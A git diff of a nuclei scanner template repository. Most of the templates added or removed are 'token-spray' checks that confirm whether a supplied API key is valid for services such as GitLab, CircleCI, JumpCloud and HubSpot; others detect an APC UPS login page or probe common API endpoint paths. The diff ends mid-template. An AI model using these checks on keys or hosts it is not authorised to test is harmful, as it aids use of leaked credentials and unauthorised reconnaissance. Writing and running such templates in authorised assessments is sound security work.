a/nuclei-templates/Other/apc-info-378.yaml b/nuclei-templates/Other/apc-info.yaml similarity index 100% rename from nuclei-templates/Other/apc-info-378.yaml rename to nuclei-templates/Other/apc-info.yaml diff --git a/nuclei-templates/Other/apc-ups-login-381.yaml b/nuclei-templates/Other/apc-ups-login-381.yaml deleted file mode 100644 index 46722d9e73..0000000000 --- a/nuclei-templates/Other/apc-ups-login-381.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: apc-ups-login - -info: - name: APC UPS Login - author: droberson - severity: info - reference: - - https://www.shodan.io/search?query=title%3A%22APC+%7C+Log+On%22 - tags: iot,panel - -requests: - - method: GET - path: - - "{{BaseURL}}/logon.htm" - - matchers-condition: and - matchers: - - type: word - words: - - 'APC | Log On' - part: body - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/apc-ups-login-382.yaml b/nuclei-templates/Other/apc-ups-login-382.yaml new file mode 100644 index 0000000000..f28e384f2c --- /dev/null +++ b/nuclei-templates/Other/apc-ups-login-382.yaml @@ -0,0 +1,24 @@ +id: apc-ups-login + +info: + name: APC UPS Login + author: droberson + severity: info + reference: https://www.shodan.io/search?query=title%3A%22APC+%7C+Log+On%22 + tags: iot,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/logon.htm" + + matchers-condition: and + matchers: + - type: word + words: + - 'APC | Log On' + part: body + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/api-abstractapi.yaml b/nuclei-templates/Other/api-abstractapi-383.yaml similarity index 100% rename from nuclei-templates/Other/api-abstractapi.yaml rename to nuclei-templates/Other/api-abstractapi-383.yaml diff --git a/nuclei-templates/Other/api-abuseipdb-385.yaml b/nuclei-templates/Other/api-abuseipdb-385.yaml deleted file mode 100644 index ca83d86700..0000000000 --- a/nuclei-templates/Other/api-abuseipdb-385.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: api-abuseipdb - -info: - name: AbuseIPDB API Test - author: daffainfo - severity: info - reference: - - https://docs.abuseipdb.com/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AbuseIPDB.md - tags: token-spray,abuseipdb - -self-contained: true -requests: - - raw: - - | - POST https://api.abuseipdb.com/api/v2/report HTTP/1.1 - Host: api.abuseipdb.com - Key: {{token}} - Accept: application/json - Content-Type: application/x-www-form-urlencoded - Content-Length: 16 - - ip=127.0.0.1&categories=18,22&comment=SSH%20login%20attempts%20with%20user%20root. - - matchers: - - type: word - part: body - words: - - 'data":' - - 'ipAddress":' - condition: and diff --git a/nuclei-templates/Other/api-abuseipdb.yaml b/nuclei-templates/Other/api-abuseipdb.yaml new file mode 100644 index 0000000000..077084fa93 --- /dev/null +++ b/nuclei-templates/Other/api-abuseipdb.yaml @@ -0,0 +1,31 @@ +id: api-abuseipdb + +info: + name: AbuseIPDB API Test + author: daffainfo + severity: info + reference: + - https://docs.abuseipdb.com/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/AbuseIPDB.md + tags: token-spray,abuseipdb + +self-contained: true +requests: + - raw: + - | + POST https://api.abuseipdb.com/api/v2/report HTTP/1.1 + Host: api.abuseipdb.com + Key: {{token}} + Accept: application/json + Content-Type: application/x-www-form-urlencoded + Content-Length: 16 + + ip=127.0.0.1&categories=18,22&comment=SSH%20login%20attempts%20with%20user%20root. + + matchers: + - type: word + part: body + words: + - 'data":' + - 'ipAddress":' + condition: and diff --git a/nuclei-templates/Other/api-alienvault-390.yaml b/nuclei-templates/Other/api-alienvault-390.yaml new file mode 100644 index 0000000000..d0e5ba33ae --- /dev/null +++ b/nuclei-templates/Other/api-alienvault-390.yaml @@ -0,0 +1,26 @@ +id: api-alienvault + +info: + name: AlienVault Open Threat Exchange (OTX) API Test + author: daffainfo + severity: info + reference: + - https://otx.alienvault.com/api + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AlienVault%20Open%20Threat%20Exchange.md + tags: token-spray,alienvault,exchange + +self-contained: true +requests: + - raw: + - | + GET https://otx.alienvault.com/api/v1/pulses/subscribed?page=1 HTTP/1.1 + Host: otx.alienvault.com + X-OTX-API-KEY: {{token}} + + matchers: + - type: word + part: body + words: + - '"$schema":' + - '"properties":' + condition: and diff --git a/nuclei-templates/Other/api-alienvault.yaml b/nuclei-templates/Other/api-alienvault.yaml deleted file mode 100644 index 254c5be20d..0000000000 --- a/nuclei-templates/Other/api-alienvault.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: api-alienvault - -info: - name: AlienVault Open Threat Exchange (OTX) API Test - author: daffainfo - severity: info - reference: - - https://otx.alienvault.com/api - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/AlienVault%20Open%20Threat%20Exchange.md - tags: token-spray,alienvault,exchange - -self-contained: true -requests: - - raw: - - | - GET https://otx.alienvault.com/api/v1/pulses/subscribed?page=1 HTTP/1.1 - Host: otx.alienvault.com - X-OTX-API-KEY: {{token}} - - matchers: - - type: word - part: body - words: - - '"$schema":' - - '"properties":' - condition: and diff --git a/nuclei-templates/Other/api-asana.yaml b/nuclei-templates/Other/api-asana-393.yaml similarity index 100% rename from nuclei-templates/Other/api-asana.yaml rename to nuclei-templates/Other/api-asana-393.yaml diff --git a/nuclei-templates/Other/api-bible-394.yaml b/nuclei-templates/Other/api-bible-394.yaml deleted file mode 100644 index 313d9d6612..0000000000 --- a/nuclei-templates/Other/api-bible-394.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: api-bible - -info: - name: API.Bible API Test - author: daffainfo - severity: info - reference: - - https://docs.api.bible - - https://github.com/daffainfo/all-about-apikey/blob/main/Books/API%20Bible.md - tags: token-spray,bible - -self-contained: true -requests: - - method: GET - path: - - "https://api.scripture.api.bible/v1/bibles/a6aee10bb058511c-02/verses/JHN.3.16?fums-version=3" - headers: - api-key: "{{token}}" - - matchers: - - type: word - part: body - words: - - "orgId" - - "bookId" - - "bibleId" - condition: and diff --git a/nuclei-templates/Other/api-bible.yaml b/nuclei-templates/Other/api-bible.yaml new file mode 100644 index 0000000000..9e47277d90 --- /dev/null +++ b/nuclei-templates/Other/api-bible.yaml @@ -0,0 +1,28 @@ +id: api-bible + +info: + name: API.Bible API Test + author: daffainfo + severity: info + description: Everything you need from the Bible in one discoverable place + reference: + - https://docs.api.bible + - https://github.com/daffainfo/all-about-apikey/tree/main/api-bible + tags: token-spray,bible + +self-contained: true +requests: + - method: GET + path: + - "https://api.scripture.api.bible/v1/bibles/a6aee10bb058511c-02/verses/JHN.3.16?fums-version=3" + headers: + api-key: "{{token}}" + + matchers: + - type: word + part: body + words: + - "orgId" + - "bookId" + - "bibleId" + condition: and diff --git a/nuclei-templates/Other/bitly.yaml b/nuclei-templates/Other/api-bitly.yaml similarity index 100% rename from nuclei-templates/Other/bitly.yaml rename to nuclei-templates/Other/api-bitly.yaml diff --git a/nuclei-templates/Other/api-blockchain.yaml b/nuclei-templates/Other/api-blockchain-398.yaml similarity index 100% rename from nuclei-templates/Other/api-blockchain.yaml rename to nuclei-templates/Other/api-blockchain-398.yaml diff --git a/nuclei-templates/Other/api-bravenewcoin-401.yaml b/nuclei-templates/Other/api-bravenewcoin-401.yaml new file mode 100644 index 0000000000..ef81f36b71 --- /dev/null +++ b/nuclei-templates/Other/api-bravenewcoin-401.yaml @@ -0,0 +1,29 @@ +id: api-bravenewcoin + +info: + name: Brave New Coin API Test + author: daffainfo + severity: info + reference: + - https://bravenewcoin.com/developers + - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Brave%20New%20Coin.md + tags: token-spray,bravenewcoin + +self-contained: true +requests: + - raw: + - | + GET https://bravenewcoin.p.rapidapi.com/market HTTP/1.1 + X-Rapidapi-Host: bravenewcoin.p.rapidapi.com + X-Rapidapi-Key: {{token}} + Host: bravenewcoin.p.rapidapi.com + + matchers: + - type: word + part: body + words: + - '"content":' + - '"id":' + - '"baseAssetId":' + - '"quoteAssetId":' + condition: and diff --git a/nuclei-templates/Other/api-bravenewcoin.yaml b/nuclei-templates/Other/api-bravenewcoin.yaml deleted file mode 100644 index 1fa0c10281..0000000000 --- a/nuclei-templates/Other/api-bravenewcoin.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: api-bravenewcoin - -info: - name: Brave New Coin API Test - author: daffainfo - severity: info - description: Real-time and historic crypto data from more than 200+ exchanges - reference: - - https://bravenewcoin.com/developers - - https://github.com/daffainfo/all-about-apikey/tree/main/brave-new-coin - tags: token-spray,bravenewcoin - -self-contained: true -requests: - - raw: - - | - GET https://bravenewcoin.p.rapidapi.com/market HTTP/1.1 - X-Rapidapi-Host: bravenewcoin.p.rapidapi.com - X-Rapidapi-Key: {{token}} - Host: bravenewcoin.p.rapidapi.com - - matchers: - - type: word - part: body - words: - - '"content":' - - '"id":' - - '"baseAssetId":' - - '"quoteAssetId":' - condition: and diff --git a/nuclei-templates/Other/api-buildkite.yaml b/nuclei-templates/Other/api-buildkite.yaml index fe68654528..7855f0b53b 100644 --- a/nuclei-templates/Other/api-buildkite.yaml +++ b/nuclei-templates/Other/api-buildkite.yaml @@ -1,18 +1,25 @@ id: api-buildkite + info: name: Buildkite API Test author: zzeitlin reference: https://buildkite.com/docs/apis/rest-api/user severity: info tags: token-spray,buildkite + +self-contained: true requests: - method: GET path: - "https://api.buildkite.com/v2/user" headers: Authorization: Bearer {{token}} + matchers: - - type: status - status: - - 401 - negative: true + - type: word + part: body + words: + - '"id":' + - '"graphql_id":' + - '"email":' + condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/api-buttercms-403.yaml b/nuclei-templates/Other/api-buttercms-403.yaml deleted file mode 100644 index cb2e1f1638..0000000000 --- a/nuclei-templates/Other/api-buttercms-403.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: api-buttercms -info: - name: ButterCMS API Test - author: zzeitlin - reference: https://buttercms.com/docs/api/#introduction - severity: info - tags: token-spray,buttercms -requests: - - method: GET - path: - - "https://api.buttercms.com/v2/posts/?auth_token={{token}}" - matchers: - - type: status - status: - - 401 - negative: true diff --git a/nuclei-templates/Other/api-calendly.yaml b/nuclei-templates/Other/api-calendly-404.yaml similarity index 100% rename from nuclei-templates/Other/api-calendly.yaml rename to nuclei-templates/Other/api-calendly-404.yaml diff --git a/nuclei-templates/Other/api-circleci-405.yaml b/nuclei-templates/Other/api-circleci-405.yaml deleted file mode 100644 index b01e427381..0000000000 --- a/nuclei-templates/Other/api-circleci-405.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: api-circleci - -info: - name: CircleCI API Test - author: zzeitlin - reference: https://circleci.com/docs/api/v1 - severity: info - tags: token-spray,circleci - -self-contained: true -requests: - - method: GET - path: - - "https://circleci.com/api/v1.1/me?circle-token={{token}}" - - matchers: - - type: word - part: body - words: - - '"admin"' - - '"login"' - condition: and diff --git a/nuclei-templates/Other/api-circleci-406.yaml b/nuclei-templates/Other/api-circleci-406.yaml new file mode 100644 index 0000000000..cfe7672786 --- /dev/null +++ b/nuclei-templates/Other/api-circleci-406.yaml @@ -0,0 +1,22 @@ +id: api-circleci + +info: + name: CircleCI API Test + author: zzeitlin + reference: https://circleci.com/docs/api/v1 + severity: info + tags: token-spray,circle,circleci + +self-contained: true +requests: + - method: GET + path: + - "https://circleci.com/api/v1.1/me?circle-token={{token}}" + + matchers: + - type: word + part: body + words: + - '"admin"' + - '"login"' + condition: and diff --git a/nuclei-templates/Other/api-coinapi-408.yaml b/nuclei-templates/Other/api-coinapi-408.yaml new file mode 100644 index 0000000000..6c70ef0a39 --- /dev/null +++ b/nuclei-templates/Other/api-coinapi-408.yaml @@ -0,0 +1,27 @@ +id: api-coinapi + +info: + name: CoinAPI API Test + author: daffainfo + severity: info + reference: + - https://docs.coinapi.io/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/CoinAPI.md + tags: token-spray,coinapi + +self-contained: true +requests: + - raw: + - | + GET https://rest.coinapi.io/v1/exchanges HTTP/1.1 + Host: rest.coinapi.io + X-CoinAPI-Key: {{token}} + + matchers: + - type: word + part: body + words: + - '"exchange_id":' + - '"website":' + - '"name":' + condition: and diff --git a/nuclei-templates/Other/api-coinapi.yaml b/nuclei-templates/Other/api-coinapi.yaml deleted file mode 100644 index e4a2e44374..0000000000 --- a/nuclei-templates/Other/api-coinapi.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: api-coinapi - -info: - name: CoinAPI API Test - author: daffainfo - severity: info - description: All Currency Exchanges integrate under a single api - reference: - - https://docs.coinapi.io/ - - https://github.com/daffainfo/all-about-apikey/tree/main/coinapi - tags: token-spray,coinapi - -self-contained: true -requests: - - raw: - - | - GET https://rest.coinapi.io/v1/exchanges HTTP/1.1 - Host: rest.coinapi.io - X-CoinAPI-Key: {{token}} - - matchers: - - type: word - part: body - words: - - '"exchange_id":' - - '"website":' - - '"name":' - condition: and diff --git a/nuclei-templates/Other/api-cooperhewitt-410.yaml b/nuclei-templates/Other/api-cooperhewitt-410.yaml new file mode 100644 index 0000000000..0da30b58ee --- /dev/null +++ b/nuclei-templates/Other/api-cooperhewitt-410.yaml @@ -0,0 +1,25 @@ +id: api-cooperhewitt + +info: + name: Cooper Hewitt API + author: daffainfo + severity: info + reference: + - https://collection.cooperhewitt.org/api/methods/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Cooper%20Hewitt.md + tags: token-spray,cooperhewitt + +self-contained: true +requests: + - method: GET + path: + - "https://api.collection.cooperhewitt.org/rest/?method=api.spec.formats&access_token={{token}}" + + matchers: + - type: word + part: body + words: + - '"stat":' + - '"formats":' + - '"default_format":' + condition: and diff --git a/nuclei-templates/Other/api-cooperhewitt-411.yaml b/nuclei-templates/Other/api-cooperhewitt-411.yaml deleted file mode 100644 index 6835214dfc..0000000000 --- a/nuclei-templates/Other/api-cooperhewitt-411.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-cooperhewitt - -info: - name: Cooper Hewitt API - author: daffainfo - severity: info - reference: - - https://collection.cooperhewitt.org/api/methods/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/Cooper%20Hewitt.md - tags: token-spray,cooperhewitt - -self-contained: true -requests: - - method: GET - path: - - "https://api.collection.cooperhewitt.org/rest/?method=api.spec.formats&access_token={{token}}" - - matchers: - - type: word - part: body - words: - - '"stat":' - - '"formats":' - - '"default_format":' - condition: and diff --git a/nuclei-templates/Other/api-endpoints.yaml b/nuclei-templates/Other/api-endpoints.yaml deleted file mode 100644 index 032bc0a7ff..0000000000 --- a/nuclei-templates/Other/api-endpoints.yaml +++ /dev/null @@ -1,72 +0,0 @@ -id: api-endpoints - -info: - name: Common API Endpoints - author: panch0r3d - severity: info - -requests: - - method: GET - path: - - "{{BaseURL}}/server/api/admin" - - "{{BaseURL}}/api/v1" - - "{{BaseURL}}/api/v2" - - "{{BaseURL}}/api/v3" - - "{{BaseURL}}/api/v4" - - "{{BaseURL}}/api/v5" - - "{{BaseURL}}/api/v1/users" - - "{{BaseURL}}/api/v2/users" - - "{{BaseURL}}/api/v3/users" - - "{{BaseURL}}/api/v4/users" - - "{{BaseURL}}/api/v5/users" - - "{{BaseURL}}/api/v1/orders" - - "{{BaseURL}}/api/v2/orders" - - "{{BaseURL}}/api/v3/orders" - - "{{BaseURL}}/api/v4/orders" - - "{{BaseURL}}/api/v5/orders" - - "{{BaseURL}}/api/v1/config" - - "{{BaseURL}}/api/v2/config" - - "{{BaseURL}}/api/v3/config" - - "{{BaseURL}}/api/v4/config" - - "{{BaseURL}}/api/v5/config" - - "{{BaseURL}}/api/v1/webhooks" - - "{{BaseURL}}/api/v2/webhooks" - - "{{BaseURL}}/api/v3/webhooks" - - "{{BaseURL}}/api/v4/webhooks" - - "{{BaseURL}}/api/v5/webhooks" - - "{{BaseURL}}/api/v1/health" - - "{{BaseURL}}/api/v2/health" - - "{{BaseURL}}/api/v3/health" - - "{{BaseURL}}/api/v4/health" - - "{{BaseURL}}/api/v5/health" - - "{{BaseURL}}/api/v1/accounts" - - "{{BaseURL}}/api/v2/accounts" - - "{{BaseURL}}/api/v3/accounts" - - "{{BaseURL}}/api/v4/accounts" - - "{{BaseURL}}/api/v5/accounts" - - "{{BaseURL}}/api/health" - - "{{BaseURL}}/api/config" - - "{{BaseURL}}/api/users" - - "{{BaseURL}}/api/orders" - - "{{BaseURL}}/api/webhooks" - - "{{BaseURL}}/api/accounts" - - "{{BaseURL}}/api/admin" - - "{{BaseURL}}/api/account/metadata/" - - "{{BaseURL}}/rest/api/health" - - "{{BaseURL}}/rest/api/config" - - "{{BaseURL}}/rest/api/users" - - "{{BaseURL}}/rest/api/orders" - - "{{BaseURL}}/rest/api/webhooks" - - "{{BaseURL}}/docs" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - 405 - - 500 - - 403 - - type: word - words: - - "Content-Type: application/json" - part: header diff --git a/nuclei-templates/Other/api-europeana-420.yaml b/nuclei-templates/Other/api-europeana-420.yaml new file mode 100644 index 0000000000..c0767ce8d7 --- /dev/null +++ b/nuclei-templates/Other/api-europeana-420.yaml @@ -0,0 +1,25 @@ +id: api-europeana + +info: + name: Europeana API Test + author: daffainfo + severity: info + reference: + - https://pro.europeana.eu/page/search + - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Europeana.md + tags: token-spray,europeana + +self-contained: true +requests: + - method: GET + path: + - "https://api.europeana.eu/record/v2/search.json?wskey={{token}}&query=*&rows=0&profile=facets" + + matchers: + - type: word + part: body + words: + - 'success' + - 'apikey' + - 'action' + condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/api-europeana.yaml b/nuclei-templates/Other/api-europeana.yaml deleted file mode 100644 index 520c83775d..0000000000 --- a/nuclei-templates/Other/api-europeana.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: api-europeana - -info: - name: Europeana API Test - author: daffainfo - severity: info - reference: - - https://pro.europeana.eu/page/search - - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Europeana.md - tags: token-spray,europeana - -self-contained: true -requests: - - method: GET - path: - - "https://api.europeana.eu/record/v2/search.json?wskey={{token}}&query=*&rows=0&profile=facets" - - matchers: - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/api-festivo-425.yaml b/nuclei-templates/Other/api-festivo-425.yaml deleted file mode 100644 index 30f758bdf2..0000000000 --- a/nuclei-templates/Other/api-festivo-425.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-festivo - -info: - name: Festivo API Test - author: daffainfo - severity: info - reference: - - https://docs.getfestivo.com/docs/products/public-holidays-api/intro/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Calendar/Festivo%20Public%20Holidays.md - tags: token-spray,festivo - -self-contained: true -requests: - - method: GET - path: - - "https://api.getfestivo.com/v2/holidays?country=US&api_key={{token}}&year=2020" - - matchers: - - type: word - part: body - words: - - '"id":' - - '"holidays":' - - '"name":' - condition: and diff --git a/nuclei-templates/Other/api-festivo.yaml b/nuclei-templates/Other/api-festivo.yaml new file mode 100644 index 0000000000..3911ce2636 --- /dev/null +++ b/nuclei-templates/Other/api-festivo.yaml @@ -0,0 +1,26 @@ +id: api-festivo + +info: + name: Festivo API Test + author: daffainfo + severity: info + description: Fastest and most advanced public holiday and observance service on the market + reference: + - https://docs.getfestivo.com/docs/products/public-holidays-api/intro/ + - https://github.com/daffainfo/all-about-apikey/tree/main/festivo-public-holidays + tags: token-spray,festivo + +self-contained: true +requests: + - method: GET + path: + - "https://api.getfestivo.com/v2/holidays?country=US&api_key={{token}}&year=2020" + + matchers: + - type: word + part: body + words: + - '"id":' + - '"holidays":' + - '"name":' + condition: and diff --git a/nuclei-templates/Other/api-fontawesome-426.yaml b/nuclei-templates/Other/api-fontawesome.yaml similarity index 100% rename from nuclei-templates/Other/api-fontawesome-426.yaml rename to nuclei-templates/Other/api-fontawesome.yaml diff --git a/nuclei-templates/Other/api-github-429.yaml b/nuclei-templates/Other/api-github.yaml similarity index 100% rename from nuclei-templates/Other/api-github-429.yaml rename to nuclei-templates/Other/api-github.yaml diff --git a/nuclei-templates/Other/api-gitlab-431.yaml b/nuclei-templates/Other/api-gitlab-431.yaml index 40aa5ddf2f..96a5bde8a9 100644 --- a/nuclei-templates/Other/api-gitlab-431.yaml +++ b/nuclei-templates/Other/api-gitlab-431.yaml @@ -3,19 +3,28 @@ id: api-gitlab info: name: Gitlab API Test author: Adam Crosser - reference: https://docs.gitlab.com/ee/api/personal_access_tokens.html severity: info + reference: + - https://docs.gitlab.com/ee/api/personal_access_tokens.html + metadata: + max-request: 1 tags: token-spray,gitlab self-contained: true -requests: + +http: - method: GET path: - "https://gitlab.com/api/v4/personal_access_tokens" + headers: PRIVATE-TOKEN: "{{token}}" - matchers: - - type: status - status: - - 200 \ No newline at end of file + - type: word + part: body + words: + - '"id":' + - '"created_at":' + condition: and + +# digest: 4a0a00473045022018e1d08da7b95bd30fe3380bf4314f6ea6c51c6885fe6e8c30838de488d446b8022100d1806cb0d3f05c93ba34ce2ff0796ad4bd0c2d4ea6a40962b628d43ac829abea:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-harvardart-433.yaml b/nuclei-templates/Other/api-harvardart-433.yaml new file mode 100644 index 0000000000..e9f965433e --- /dev/null +++ b/nuclei-templates/Other/api-harvardart-433.yaml @@ -0,0 +1,25 @@ +id: api-harvardart + +info: + name: Harvard Art Museums API Test + author: daffainfo + severity: info + reference: + - https://github.com/harvardartmuseums/api-docs + - https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/Harvard%20Art%20Museums.md + tags: token-spray,harvardart + +self-contained: true +requests: + - method: GET + path: + - "https://api.harvardartmuseums.org/color/34838442?apikey={{token}}" + + matchers: + - type: word + part: body + words: + - '"colorid"' + - '"name"' + - '"hex"' + condition: and diff --git a/nuclei-templates/Other/api-harvardart-434.yaml b/nuclei-templates/Other/api-harvardart-434.yaml deleted file mode 100644 index 7b2f15b76f..0000000000 --- a/nuclei-templates/Other/api-harvardart-434.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-harvardart - -info: - name: Harvard Art Museums API Test - author: daffainfo - severity: info - reference: - - https://github.com/harvardartmuseums/api-docs - - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Harvard%20Art%20Museums.md - tags: token-spray,harvardart - -self-contained: true -requests: - - method: GET - path: - - "https://api.harvardartmuseums.org/color/34838442?apikey={{token}}" - - matchers: - - type: word - part: body - words: - - '"colorid"' - - '"name"' - - '"hex"' - condition: and diff --git a/nuclei-templates/Other/heroku.yaml b/nuclei-templates/Other/api-heroku-435.yaml similarity index 100% rename from nuclei-templates/Other/heroku.yaml rename to nuclei-templates/Other/api-heroku-435.yaml diff --git a/nuclei-templates/Other/api-hubspot.yaml b/nuclei-templates/Other/api-hubspot.yaml deleted file mode 100644 index 73e525fb35..0000000000 --- a/nuclei-templates/Other/api-hubspot.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: api-hubspot -info: - name: HubSpot API Test - author: zzeitlin - reference: https://legacydocs.hubspot.com/docs/methods/owners/get_owners - severity: info - tags: token-spray,hubspot -requests: - - method: GET - path: - - "https://api.hubapi.com/owners/v2/owners?hapikey={{token}}" - - "https://api.hubapi.com/contacts/v1/lists/all/contacts/all?hapikey={{token}}" - matchers: - - type: word - part: body - words: - - 'error' - negative: true diff --git a/nuclei-templates/Other/api-iconfinder.yaml b/nuclei-templates/Other/api-iconfinder-439.yaml similarity index 100% rename from nuclei-templates/Other/api-iconfinder.yaml rename to nuclei-templates/Other/api-iconfinder-439.yaml diff --git a/nuclei-templates/Other/api-improvmx-440.yaml b/nuclei-templates/Other/api-improvmx-440.yaml new file mode 100644 index 0000000000..1b6f7e7986 --- /dev/null +++ b/nuclei-templates/Other/api-improvmx-440.yaml @@ -0,0 +1,29 @@ +id: api-improvmx + +info: + name: ImprovMX API Test + author: daffainfo + severity: info + reference: + - https://improvmx.com/api + - https://github.com/daffainfo/all-about-apikey/blob/main/Business/ImprovMX.md + tags: token-spray,improvmx + +self-contained: true +requests: + - raw: + - | + GET https://api.improvmx.com/v3/account HTTP/1.1 + Authorization: Basic {{base64(':' + token)}} + Host: api.improvmx.com + + redirects: true + max-redirects: 1 + matchers: + - type: word + part: body + words: + - '"billing_email":' + - '"cancels_on":' + - '"company_details":' + condition: and diff --git a/nuclei-templates/Other/api-improvmx.yaml b/nuclei-templates/Other/api-improvmx.yaml deleted file mode 100644 index fb6c00f0d9..0000000000 --- a/nuclei-templates/Other/api-improvmx.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: api-improvmx - -info: - name: ImprovMX API Test - author: daffainfo - severity: info - description: API for free email forwarding service - reference: - - https://improvmx.com/api - - https://github.com/daffainfo/all-about-apikey/tree/main/improvmx - tags: token-spray,improvmx - -self-contained: true -requests: - - raw: - - | - GET https://api.improvmx.com/v3/account HTTP/1.1 - Authorization: Basic {{base64(':' + token)}} - Host: api.improvmx.com - - redirects: true - max-redirects: 1 - matchers: - - type: word - part: body - words: - - '"billing_email":' - - '"cancels_on":' - - '"company_details":' - condition: and diff --git a/nuclei-templates/Other/api-instagram.yaml b/nuclei-templates/Other/api-instagram-441.yaml similarity index 100% rename from nuclei-templates/Other/api-instagram.yaml rename to nuclei-templates/Other/api-instagram-441.yaml diff --git a/nuclei-templates/Other/api-ipstack-444.yaml b/nuclei-templates/Other/api-ipstack-444.yaml deleted file mode 100644 index 9fbe1ff033..0000000000 --- a/nuclei-templates/Other/api-ipstack-444.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: api-ipstack -info: - name: IPStack API Test - author: zzeitlin - reference: https://ipstack.com/documentation - severity: info - tags: token-spray,ipstack -requests: - - method: GET - path: - - "https://api.ipstack.com/8.8.8.8?access_key={{token}}" - matchers: - - type: word - part: body - negative: true - words: - - 'invalid_access_key' diff --git a/nuclei-templates/Other/api-iterable-445.yaml b/nuclei-templates/Other/api-iterable-445.yaml new file mode 100644 index 0000000000..0c1f84d566 --- /dev/null +++ b/nuclei-templates/Other/api-iterable-445.yaml @@ -0,0 +1,23 @@ +id: api-iterable + +info: + name: Iterable API Test + author: zzeitlin + reference: https://api.iterable.com/api/docs + severity: info + tags: token-spray,iterable + +requests: + - method: GET + path: + - "https://api.iterable.com/api/export/data.json?dataTypeName=emailSend&range=Today&onlyFields=List.empty" + headers: + Api_Key: "{{token}}" + + matchers: + - type: word + part: body + negative: true + words: + - 'BadApiKey' + - 'RateLimitExceeded' # Matchers needs to be replaced with valid +ve match instead of -ve diff --git a/nuclei-templates/Other/api-jumpcloud-446.yaml b/nuclei-templates/Other/api-jumpcloud-446.yaml new file mode 100644 index 0000000000..6b9dc68d93 --- /dev/null +++ b/nuclei-templates/Other/api-jumpcloud-446.yaml @@ -0,0 +1,24 @@ +id: api-jumpcloud + +info: + name: JumpCloud API Test + author: zzeitlin + severity: info + reference: https://docs.jumpcloud.com/1.0/authentication-and-authorization/api-key + tags: token-spray,jumpcloud + +self-contained: true +requests: + - method: GET + path: + - "https://console.jumpcloud.com/api/systems" + headers: + X-Api-Key: "{{token}}" + + matchers: + - type: word + part: body + words: + - '"_id":' + - '"agentServer":' + condition: and diff --git a/nuclei-templates/Other/api-jumpcloud.yaml b/nuclei-templates/Other/api-jumpcloud.yaml deleted file mode 100644 index a828f3e442..0000000000 --- a/nuclei-templates/Other/api-jumpcloud.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: api-jumpcloud -info: - name: JumpCloud API Test - author: zzeitlin - reference: https://docs.jumpcloud.com/1.0/authentication-and-authorization/api-key - severity: info - tags: token-spray,jumpcloud -requests: - - method: GET - path: - - "https://console.jumpcloud.com/api/systems" - headers: - X-Api-Key: "{{token}}" - matchers: - - type: word - part: body - negative: true - words: - - 'Unauthorized' diff --git a/nuclei-templates/Other/api-linkedin.yaml b/nuclei-templates/Other/api-linkedin-451.yaml similarity index 100% rename from nuclei-templates/Other/api-linkedin.yaml rename to nuclei-templates/Other/api-linkedin-451.yaml diff --git a/nuclei-templates/Other/api-loqate-453.yaml b/nuclei-templates/Other/api-loqate-453.yaml deleted file mode 100644 index 6e4e835a15..0000000000 --- a/nuclei-templates/Other/api-loqate-453.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: api-loqate -info: - name: Loqate API Test - author: zzeitlin - reference: https://www.loqate.com/resources/support/apis/Capture/Interactive/Find/1.1/ - severity: info - tags: token-spray,loqate -requests: - - method: GET - path: - - "api.addressy.com/Capture/Interactive/Find/v1.00/json3.ws?Key={{token}}&Countries=US,CA&Language=en&Limit=5&Text=BHAR" - matchers: - - type: word - part: body - negative: true - words: - - 'Unknown key' diff --git a/nuclei-templates/Other/api-loqate.yaml b/nuclei-templates/Other/api-loqate.yaml new file mode 100644 index 0000000000..10fa82f23a --- /dev/null +++ b/nuclei-templates/Other/api-loqate.yaml @@ -0,0 +1,21 @@ +id: api-loqate + +info: + name: Loqate API Test + author: zzeitlin + severity: info + reference: https://www.loqate.com/resources/support/apis/Capture/Interactive/Find/1.1/ + tags: token-spray,loqate + +self-contained: true +requests: + - method: GET + path: + - "https://api.addressy.com/Capture/Interactive/Find/v1.00/json3.ws?Key={{token}}&Countries=US,CA&Language=en&Limit=5&Text=BHAR" + + matchers: + - type: word + part: body + negative: true + words: + - 'Unknown key' diff --git a/nuclei-templates/Other/api-mailchimp.yaml b/nuclei-templates/Other/api-mailchimp.yaml new file mode 100644 index 0000000000..68d9d200ce --- /dev/null +++ b/nuclei-templates/Other/api-mailchimp.yaml @@ -0,0 +1,17 @@ +id: api-mailchimp +info: + name: Mailchimp API Test + author: zzeitlin + reference: https://mailchimp.com/developer/transactional/docs/smtp-integration/#credentials-and-configuration + severity: info + tags: token-spray,mailchimp +network: + - inputs: + - data: "AUTH PLAIN 